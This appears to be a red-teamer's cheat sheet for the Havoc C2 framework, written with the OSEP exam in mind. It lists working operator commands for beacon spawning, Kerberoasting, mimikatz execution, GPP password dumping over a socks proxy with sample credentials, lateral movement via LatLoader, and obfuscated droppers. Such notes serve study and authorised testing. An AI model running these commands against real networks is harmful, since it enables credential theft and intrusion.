Note
C5Spider (the Author) is currently doing a re-write of Havoc which will most likely improve it’s capabilities and stability. See the havoc repo’s rewrite branch for more details.
Havoc is still a new C2 framework and has some limitations, things it cannot do and things that may break. Also the havoc client can be a little resource hungry… During OSEP Exam, my VM crashed a few times because of it or the havoc client process was killed. Also had computer crashes but that is most likely a combination of this and Offsec’s proctoring extension.
Commands
# https://github.com/HavocFramework/Havoc/blob/main/WIKI.MD#commands
# ~~~ Non-exhaustive list below ~~~
# fork and run. nice to start a second beacon in case the first one dies or something
shellcode spawn x64 /payloads/demon.x64.bin
# ADCS
adcs_enum
# Kerberoasting
get-spns
kerberoast <spn>
# run PE inline (exe) - builtin to Havoc - https://github.com/fortra/No-Consolation
noconsolation /tools/mimikatz/x64/mimikatz.exe "klist exit"
# dotnet inline execute
dotnet inline-execute "/tools/SharpCollection/NetFramework_4.7_Any/SharpView.exe" Find-LocalAdminAccess
# Socks Proxy
socks add 4242
# dont forget to edit your /etc/proxychains4.conf
proxychains4 netexec smb dc01.pinecorp.local -u deamian -p Winter2000 -M gpp_autologin -M gpp_password
# port forwarding (usefull to forward a webserver or something)
# w/o for firewall settings on the beacon's host
rportfwd ....
# enum local sessions
enumlocalsessions
sessions
quser
schtaskenum
netview
klist
# dir remote share and cat content of file
dir "\\dc01.pinecorp.local\SYSVOL"
cat "\\dc01.pinecorp.local\SYSVOL\pinecorp.local/Policies/{EA980932-BE55-11EF-B70F-579199F31135}/Machine/Preferences/Registry/Registry.xml"
# lateral movement
# requires LatLoader bof: https://github.com/icyguider/LatLoader
# trkwks4185 is the name of your pipe as defined in your SMB listener config
LatLoader xorload dev01.pinecorp.local /payloads/smb.x64.bin
pivot connect dev01.pinecorp.local trkwks4185Modules
LatLoader (Lateral Movement)
- LatLoader | LatLoader is a PoC module to demonstrate automated lateral movement with the Havoc C2 framework.
# lateral movement
LatLoader xorload dev01.pinecorp.local /payloads/smb.x64.bin
# dont forget to connect to host if you used an smb beacon
pivot connect dev01.pinecorp.local trkwks4185Shhhhloader (Obfuscated Dropper)
- Shhhhloader | Syscall Shellcode Loader
Decent obfuscation tool. However, can sometimes break because of obscure havoc profile configurations…
Use the GUI button in the navbar to generate your payload.
Warning
The tool currently doesn’t support grabbing the payloads from the listeners directly. You have to generate them prior and upload them via the file input in the GUI.
UAC-BOF-Bonanza (UAC Bypass BOF)
Tbd
Untested but look interesting
HighBorn (UAC Bypass BOF)
Tbd
Untested but look interesting
Pre-compiled binaries
# run PE inline (non C# exe)
noconsolation /tools/mimikatz/x64/mimikatz.exe "klist exit"
# dotnet inline execute (C# exe)
dotnet inline-execute "/tools/SharpCollection/NetFramework_4.7_Any/SharpView.exe" Find-LocalAdminAccessDotnet C# binaries:
- https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
- https://github.com/Flangvik/SharpCollection
Havoc Profiles
Warning
I’ve had issues with listeners not working properly and not binding correctly. I recommend adding the listeners to your profile directly and if you have to modify or update one, do it from the profile config file and restart the server. (You will not loose your data… but beacons might die if you change the communication protocols, ports etc…)
python3 havoc_profile_generator.pyLimitations
Havoc doesn’t support import-powershell so you need to do it yourself when running a powershell command:
powershell import-module C:\windows\tasks\somemodule.ps1; Invoke-ModuleCMDRef: https://github.com/HavocFramework/Havoc/issues/492#issuecomment-2198213157